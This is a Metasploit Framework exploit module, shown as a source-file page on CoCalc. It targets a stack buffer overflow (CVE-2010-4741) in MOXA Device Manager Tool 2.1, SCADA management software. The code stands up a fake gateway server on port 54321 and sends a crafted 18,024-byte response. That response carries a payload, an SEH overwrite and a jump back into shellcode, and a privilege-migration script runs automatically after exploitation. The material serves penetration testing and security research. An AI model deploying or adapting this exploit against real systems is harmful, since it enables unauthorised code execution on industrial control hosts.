CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/moxa_mdmtool.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'MOXA Device Manager Tool 2.1 Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.

17
        When sending a specially crafted MDMGw (MDM2_Gateway) response, an

18
        attacker may be able to execute arbitrary code.

19
      },

20
      'Author'         => [ 'Ruben Santamarta', 'MC' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'CVE', '2010-4741'],

25
          [ 'OSVDB', '69027'],

26
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],

27
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-301-01A' ]

28
        ],

29
      'DefaultOptions' =>

30
        {

31
          'EXITFUNC' => 'thread',

32
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

33
        },

34
      'Payload'        =>

35
        {

36
          'Space'    => 600,

37
          'BadChars' => "\x00\x0a\x0d\x20",

38
          'StackAdjustment' => -3500

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...

44
        ],

45
      'Privileged'     => false,

46
      'DisclosureDate' => '2010-10-20',

47
      'DefaultTarget'  => 0))

48


49
    register_options(

50
      [

51
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])

52
      ])

53
  end

54


55
  def on_client_connect(client)

56


57
    return if ((p = regenerate_payload(client)) == nil)

58


59
    client.get_once

60


61
    sploit = rand_text_alpha_upper(18024)

62


63
    sploit[0, 4] = [0x29001028].pack('V')

64
    sploit[472, payload.encoded.length] = payload.encoded

65
    sploit[1072, 8] = generate_seh_record(target.ret)

66
    sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string

67


68
    client.put(sploit)

69


70
    handler(client)

71


72
    service.close_client(client)

73


74
  end

75
end

76


77